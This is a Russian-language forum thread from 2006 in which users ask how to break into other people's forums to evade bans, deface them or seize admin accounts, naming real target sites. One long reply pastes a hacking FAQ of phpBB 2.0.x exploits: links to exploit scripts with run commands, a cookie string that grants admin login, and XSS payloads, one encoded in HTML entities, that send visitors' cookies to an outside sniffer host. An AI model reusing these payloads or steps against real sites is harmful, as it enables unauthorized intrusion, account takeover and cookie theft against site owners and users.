как взломать форум ?
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
как взломать форум ? - 2006-09-07 14:44:58
|
|
|
ondas
Сообщений: 81
Оценки: 0
Присоединился: 2006-04-10 07:13:11
|
есть один форум хочу его взломать а то банят меня там .
|
|
|
как взломать форум ? - 2006-09-07 15:19:05
|
|
|
Pupkin-Zade
Сообщений: 9398
Оценки: 1489
Присоединился: 2004-03-10 13:54:16
|
Взламывай, мы не против
|
|
|
как взломать форум ? - 2006-09-07 15:34:27
|
|
|
ondas
Сообщений: 81
Оценки: 0
Присоединился: 2006-04-10 07:13:11
|
пупкин а как взломать его подскажи
|
|
|
как взломать форум ? - 2006-09-07 17:29:49
|
|
|
Pupkin-Zade
Сообщений: 9398
Оценки: 1489
Присоединился: 2004-03-10 13:54:16
|
Определяешь местонахождение - едешь - берешь кувалду - ломаешь компьютер.
Форум сломан!
|
|
|
как взломать форум ? - 2006-09-07 17:30:19
|
|
|
-=lebed=-
Сообщений: 1511
Оценки: 0
Присоединился: 2006-04-17 14:25:19
|
quote:
—————-<BR>Цитата: Дата:07.09.2006 15:34:27, Автор:ondas :: пупкин а как взломать его подскажи —————-
А какой форум?[sm=2.gif]
|
|
|
как взломать форум ? - 2006-09-07 19:40:25
|
|
|
AdReNaL1Ne
Сообщений: 8027
Оценки: 350
Присоединился: 2005-09-11 06:38:05
|
quote:
—————-<BR>Цитата: Дата:07.09.2006 17:29:49, Автор:Pupkin-Zade :: Определяешь местонахождение - едешь - берешь кувалду - ломаешь компьютер.<BR>Форум сломан! —————-
Неправильно, надо кувалдой бить админов, это же они-сцуки банят…[sm=2.gif]
|
|
|
как взломать форум ? - 2006-09-07 19:45:15
|
|
|
ondas
Сообщений: 81
Оценки: 0
Присоединился: 2006-04-10 07:13:11
|
меня банят по логину . менял логин тоже баня уже по айпи . пупкин что посоветуешь кроме кувалды . моя цель 1. обойти бан 2. на весь форум повесить обьявление "здесь был вася"
|
|
|
как взломать форум ? - 2006-09-07 22:40:09
|
|
|
ondas
Сообщений: 81
Оценки: 0
Присоединился: 2006-04-10 07:13:11
|
скачал этот стеганос аноним почето меняет айпи без проблем но упорно не могу зайти после смены айпи на са
|
|
|
как взломать форум ? - 2006-09-08 08:58:26
|
|
|
[Boostеr]
Сообщений: 34
Оценки: 0
Присоединился: 2005-07-22 18:55:02
|
Порутай его…[sm=1.gif] А на чём форум-то висит?
|
|
|
как взломать форум ? - 2006-09-08 09:31:16
|
|
|
ondas
Сообщений: 81
Оценки: 0
Присоединился: 2006-04-10 07:13:11
|
как понять на чем висит? с жаргонами я не очень вот этот форум никак не отправить вопрос и прчее ч моим логином http://forum.mobile.uz/
|
|
|
как взломать форум ? - 2006-09-08 13:18:34
|
|
|
[Boostеr]
Сообщений: 34
Оценки: 0
Присоединился: 2005-07-22 18:55:02
|
Давай я посмотрю… И всё скажу тебе….
|
|
|
как взломать форум ? - 2006-09-08 16:06:09
|
|
|
ondas
Сообщений: 81
Оценки: 0
Присоединился: 2006-04-10 07:13:11
|
бустер покопайся жду с нетерпением
|
|
|
как взломать форум ? - 2006-09-08 18:36:46
|
|
|
[Boostеr]
Сообщений: 34
Оценки: 0
Присоединился: 2005-07-22 18:55:02
|
Щас времени свободно мало… Давай как освобожусь, займусь…. Кое-что уже удалось узнать[sm=1.gif]
|
|
|
RE: как взломать форум ? - 2006-09-24 22:07:05.320000
|
|
|
Ded MustD!e
Сообщений: 567
Оценки: 0
Присоединился: 2006-07-23 17:19:08
|
Юзай эксплойт для форума, он же дырявый… - http://www.securitylab.ru/vulnerability/202802.php Это для 1.3Final версии(как там внизу и написано), но они могут и врать…
|
|
|
RE: как взломать форум ? - 2006-10-10 13:20:30.670000
|
|
|
Asmodeus
Сообщений: 5
Оценки: 0
Присоединился: 2006-10-10 13:13:17.390000
|
Господа нуна Помощь, мини нуно какнить запоганить одИн форум так милая шуточка, читоб люди не творили беспридел. я понимаю там всякие эксплоиты Май SQLи но млин немогли расписать всё это для чайникак как и и чего по пунктам я так понял спомощью эксплоита мона вскрыть форум Да тобишь увидеть его листинг или я ошибаюсь еси так то эт отлично покажите как до него добраться и чтитоб я мог там уже испровлять, а и ещё читоб мини не посикле нуно исп сакс но млин я вроде бы установил и всё такое но запара где брать сакс сервер я так понял это айпишник какойта чттито за айпи и почему все за такую инфу берут лаве чёт я не догоняю это какой та особый сервер читоль с мега файрволом иль чито? господа Хакеры Плиз
|
|
|
RE: как взломать форум ? - 2006-10-10 14:21:32
|
|
|
MindGame
Сообщений: 765
Оценки: 0
Присоединился: 2006-08-21 18:53:44
|
Почитай контен quote:
ORIGINAL: Asmodeus Господа нуна Помощь, мини нуно какнить запоганить одИн форум так милая шуточка, читоб люди не творили беспридел. я понимаю там всякие эксплоиты Май SQLи но млин немогли расписать всё это для чайникак как и и чего по пунктам я так понял спомощью эксплоита мона вскрыть форум Да тобишь увидеть его листинг или я ошибаюсь еси так то эт отлично покажите как до него добраться и чтитоб я мог там уже испровлять, а и ещё читоб мини не посикле нуно исп сакс но млин я вроде бы установил и всё такое но запара где брать сакс сервер я так понял это айпишник какойта чттито за айпи и почему все за такую инфу берут лаве чёт я не догоняю это какой та особый сервер читоль с мега файрволом иль чито? господа Хакеры Плиз Не, давай еще раз напиши все только без "млин, псс, типа, чёт. еси", а то так очень трудно разобрать, что ты хочешь…
|
|
|
RE: как взломать форум ? - 2006-10-11 12:37:07.296666
|
|
|
Asmodeus
Сообщений: 5
Оценки: 0
Присоединился: 2006-10-10 13:13:17.390000
|
Окей.=) Я хотел чтоб Вы мне помогли разобраться взломе форуму, так как я чайник вэтом деле. ситуация такая, можно ли спомощью какой нибудь проги изменять листинг форума , и чтоб все мои изменения сохронялись уних на сервере( или как там я просто не очень силен в терминалогии) так как просто листннг дость эт фигня фсё а вот чтоб фсё это делать так как кделает админ или хотя бы при входе на форум пользователи несмогли зайти и увидели какуюнить надпись например когда профилактика проходит типа такой=). ну и ещё вопрос по защите себя чтоб меня не смогли просечь а точнее мой IP скачал прогу Сакс ну которая использует протоколы Сакс4 и Сакс 5, так вот я так понял чтоб использовать Сакс5 нужен логин и порольл ясно дело умя его нет и я впринципе не знаю где его взять но такая же проблема и с Сакс4 там нужен адрес Сакс сервера…Я так понял там нужен IP адресс водить но опять какой я тож не наю. вот в принципе я вэтом Вас и прошу мне помочь хотя бы ни делом а просто описанием, инфой, хорошо бы былобы пошагово. а и ещё этот форум юзают внутри сети причём я не вэтой сети эт тож проблема или как? Благадарю зарание
|
|
|
RE: как взломать форум ? - 2006-10-11 14:59:49.233333
|
|
|
MindGame
Сообщений: 765
Оценки: 0
Присоединился: 2006-08-21 18:53:44
|
Дай ссылку на этот форум, и посмотрим, что с ним можно сделать
|
|
|
RE: как взломать форум ? - 2006-10-11 16:35:38.516666
|
|
|
Asmodeus
Сообщений: 5
Оценки: 0
Присоединился: 2006-10-10 13:13:17.390000
|
quote:
ORIGINAL: MindGame Дай ссылку на этот форум, и посмотрим, что с ним можно сделать http://forum.lamagrad.ru/
|
|
|
RE: как взломать форум ? - 2006-10-11 16:36:04.783333
|
|
|
Asmodeus
Сообщений: 5
Оценки: 0
Присоединился: 2006-10-10 13:13:17.390000
|
сенк зарание=)
|
|
|
RE: как взломать форум ? - 2006-10-11 23:10:29.856666
|
|
|
st0f_12
Сообщений: 49
Оценки: 0
Присоединился: 2006-10-02 15:43:51.593333
|
Взято с форума antichat.ru FAQ Взлом форумов: если есть ещё какие вопросы могу кое что разъяснить )) стучите в асю ))) phpBB 2.0.4 Цель: просмотр содержимого файлов на сервере Описание: Была выпущена в 2002. Данная версия почти не присутствует в сети. Описание уязвимости: Некорректная обработка входных параметров в Admin_Styles.PHP. Exploit: http://milw0rm.com/id.php?id=47 phpBB 2.0.5 Цель: просмотр hash'a пароля Описание: Выпущена в 2002. Также редкая версия. Описание уязвимости: Возможность создания специального SQL запроса, уязвимость существует в при обработке $topic_id. Возможно добавить 2 запрос, тем самым захватить хэш. Exploit: http://milw0rm.com/id.php?id=44 При запуске $remote = shift || 'localhost'; - изменяем на нужный например 255.255.255.255, $uid = shift || 2; - ID нужного нам пользователя. В форумах phpBB ID администратора по умолчанию "2". Затем пишем "perl exp.pl" Video: - phpBB 2.0.6 Цель: просмотр hash'a пароля Описание: Выпущена в 2002. Также редкая версия. Описание уязвимости: Возможность создания специального SQL запроса, уязвимость существует в модуле search.php. Exploit: http://milw0rm.com/id.php?id=137 Запускаем "perl exp.pl <server> <folder> <user_id> <search_id>" Где <server> - ip сервера (ip сервера можно узнать так Пуск->Выполнить-> набрать cmd, затем в появивешмся окне набрать "ping test.com"), <folder> - папка где находится сам форум (например если у нас http://123.123.123.123/forum/index.php, вместо <folder> пишем forum), <user_id> <search_id> - ID пользователя. Video: http://video.antichat.net/videos/kez/phpbb_206_sql2.rar phpBB 2.0.10 Пропустим версии с 7 по 9, т.к. в них присутствует те же уязвимости, что и в phpBB 2.0.10. Цель: (1) Выполение произвольных команд. Описание: Была выпущена так же в 2002. Данная версия встречается намного чаще, чем младшие. Но реже чем старшие =). Был произведён дефейс сайта phpbb.com, с помощью найденной уязвимости в этой версии. Описание уязвимости: Некорректная обработка входных параметров в viewtopic.php. Exploit: http://milw0rm.com/id.php?id=647 Запускать "perl exp.pl [*URL] [DIR] [NUM] [CMD]" Где [*URL] - урл сайта (например http://www.test.com), [DIR] - директория в которой находится форум(например /forum/ или /forum), [NUM] - номер топика (обязательно существующего), [CMD] - команда которую следует выполнить (например ls -la, справочник всех команд *nix http://forum.antichat.ru/threadnav7345-1-10.html) video: - Цель: (2) Попадание в админку обходя ограничения. Описание: - Описание уязвимости: Некорректная обработка входных параметров в Admin_Styles.PHP. Exploit: В архиве с видео =) Video: http://video.antichat.net/videos/wizi/vhackbbshwizi.rar phpBB <= 2.0.12 Цель: Вход на форум аккаунтом администратора. Описание: - Описание уязвимости: Для начала нам следует зарегаться на форуме. Затем, войти под своим аккаунтом и если стоит галка "Автоматический вход",то убрать её. Нам нужно отредактировать кукисы (посоветую делать это в опере Tools->Advanced->Cookies), вместо Цитата: a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%2 2%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%22X%22%3B%7D X - наш ID , а меняем на Цитата: a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs% 3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D 2 - как уже говорилось выше, ID админа Exploit: "a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs% 3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D" Video: - phpBB <= 2.0.13 Цель: просмотр hash'a пароля, любого пользователя Описание: - Описание уязвимости: Уязвимость присутствует в модуле downloads.php. Есть возможность SQL инъекции Exploit: http://milw0rm.com/id.php?id=907 Запускать "perl exp.pl <site> <dir> <id>" Где <site> URL сайта <dir> - директория <id> - нужный нам пользователь Video: - phpBB <= 2.0.15 Цель: получение Имя,Логина, Пароля от БД. Описание: - Описание уязвимости: Уязвимость пристутствует в модуле viewtopic.php. Exploit: http://milw0rm.com/id.php?id=1080 Запускать "perl exp.pl <server> <dir> <id> \r\n" Где <server> - ip сервера, <dir> - директория в которой находится форум <id> номер существующего топика. Video: - phpBB <= 2.0.16 Цель: получение hash'a пароля пользователя Описание: - Описание уязвимости: В данной версии присутствует XSS (Cross Site Scripting более подробно про XSS можно почитать тут http://antichat.ru/txt/xssoverview/ или http://ha.ckers.org/xss.html), которая получить кукисы. Они высылаются на сниффер, логи которого можно посмотреть здесь http://antichat.ru/sniff/log.php. Exploit: Код: [*color=#EFEFEF][*url]www.ut[*url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(th is.sss));'sss=`i=new/**/Image();i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]' Video: - phpBB <= 2.0.17 Цель: выполнение произвольных команд на сервере(php-inj) Описание: - Описание уязвимости: В данной версии присутствует уязвимость в модуле profile.php. Exploit: http://rst.void.ru/download/r57phpbb2017.txt Запускать "perl exp.pl <URL> <cmd>" Где <URL> - ссылка до форума например http://site.com/phpBB/, <cmd> - нужная команда (о командах читаем тут http://forum.antichat.ru/threadnav7345-1-10.html). Video: - phpBB <= 2.0.18 Цель: получение hash'a пароля пользователя Описание: найдена WJ (White Jordan =) Описание уязвимости: В данной версии присутствует XSS. Exploit: Код:[UR*L]http://www.[U*RL=http://wj.com/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32;]wj[/*URL][/*URL]
|
|
|
RE: как взломать форум ? - 2006-10-12 07:16:39.293333
|
|
|
MindGame
Сообщений: 765
Оценки: 0
Присоединился: 2006-08-21 18:53:44
|
Ну я думаю больше помощи не надо
|
|
|
RE: как взломать форум ? - 2006-10-12 09:17:01.186666
|
|
|
MindGame
Сообщений: 765
Оценки: 0
Присоединился: 2006-08-21 18:53:44
|
Хотя нет, вот еще можешь видео файлик глянуть http://video.antichat.ru/download_168.html
|
|
|
RE: как взломать форум ? - 2006-10-12 10:28:39.340000
|
|
|
Asmodeus
Сообщений: 5
Оценки: 0
Присоединился: 2006-10-10 13:13:17.390000
|
ООООООООООООО Огромнейшее вам Сенк=)) Я рад что есть в сети Отзывчивые люди огромное вам спосибочки инфы предостаточно думаю дальше я разберусь что кчему сенк ещё раз За помоЩ
|
|
|
RE: как взломать форум ? - 2006-12-07 08:45:01.483333
|
|
|
Urm
Сообщений: 2
Оценки: 0
Присоединился: 2006-12-07 08:32:11.046666
|
Народ, может кто поможет ломануть форум?
|
|
|
RE: как взломать форум ? - 2006-12-07 20:25:46.296666
|
|
|
prize
Сообщений: 88
Оценки: 0
Присоединился: 2006-07-10 21:42:40
|
народ, мож кто поможет с www.lyceum.tushino.com тока плиз без фанатизма(ниче не удалять плз) … админка нужна…. я бывший админ…
|
|
|
RE: как взломать форум ? - 2006-12-07 20:27:02.923333
|
|
|
prize
Сообщений: 88
Оценки: 0
Присоединился: 2006-07-10 21:42:40
|
я знаю ,что ето пхпбб 2 и больше ниче…
|
|
|
RE: как взломать форум ? - 2006-12-07 20:35:46.733333
|
|
|
Unknown_Artist
Сообщений: 87
Оценки: 0
Присоединился: 2006-10-15 16:35:35.443333
|
quote:
ORIGINAL: prize quote:
я бывший админ я знаю ,что ето пхпбб 2 и больше ниче… Вы, наверно, не тот за кого вы себя выдаете.
|
|
|
RE: как взломать форум ? - 2006-12-07 21:24:33.500000
|
|
|
prize
Сообщений: 88
Оценки: 0
Присоединился: 2006-07-10 21:42:40
|
нет, я именно тот, я ставил форум в 2004 году и ниче не помню…а пароль на хостинге и на админе были одинаковыми…ниче сделать немогу…
|
|
|
RE: как взломать форум ? - 2006-12-07 21:32:58.046666
|
|
|
Edinorog
Сообщений: 1
Оценки: 0
Присоединился: 2006-12-07 21:04:44.046666
|
Есть форум на базе vBulletin v3.0.1 Надо пароль админа. Хелп
|
|
|
RE: как взломать форум ? - 2006-12-07 23:38:15.046666
|
|
|
YunArIs
Сообщений: 83
Оценки: 0
Присоединился: 2006-12-07 20:18:09.843333
|
пацаны помогите мне узнать логин и пароль админа на сайте www.umapalata.com.ua зарание спасибо если узнаете то напишете его в саьку 490197453 :)
|
|
|
RE: как взломать форум ? - 2006-12-08 00:06:44.030000
|
|
|
User
Сообщений: 1605
Оценки: 0
Присоединился: 2006-10-15 02:44:55.710000
|
ну кто тебе бесплатно чё будет делать!!!
|
|
|
RE: как взломать форум ? - 2006-12-08 11:20:01.670000
|
|
|
Sma11erM1nd
Сообщений: 123
Оценки: 0
Присоединился: 2006-06-10 03:56:35
|
Топик превратился в список заказов какой-то):)
|
|
|
RE: как взломать форум ? - 2006-12-08 19:18:31.093333
|
|
|
prize
Сообщений: 88
Оценки: 0
Присоединился: 2006-07-10 21:42:40
|
ну помогите плз, у мне ниче не выходит, уже полнеедли бьюся…
|
|
|
RE: как взломать форум ? - 2006-12-11 16:53:08.716666
|
|
|
prize
Сообщений: 88
Оценки: 0
Присоединился: 2006-07-10 21:42:40
|
спс))8|
|
|
|
RE: как взломать форум ? - 2006-12-11 17:57:18.513333
|
|
|
prize
Сообщений: 88
Оценки: 0
Присоединился: 2006-07-10 21:42:40
|
Тока оно тоже неработает, пишет что неуязвим…и шо делать
|
|
|
RE: как взломать форум ? - 2006-12-11 18:14:42.250000
|
|
|
prize
Сообщений: 88
Оценки: 0
Присоединился: 2006-07-10 21:42:40
|
помогите ктонить..них** не выходит…
|
|
|
|
|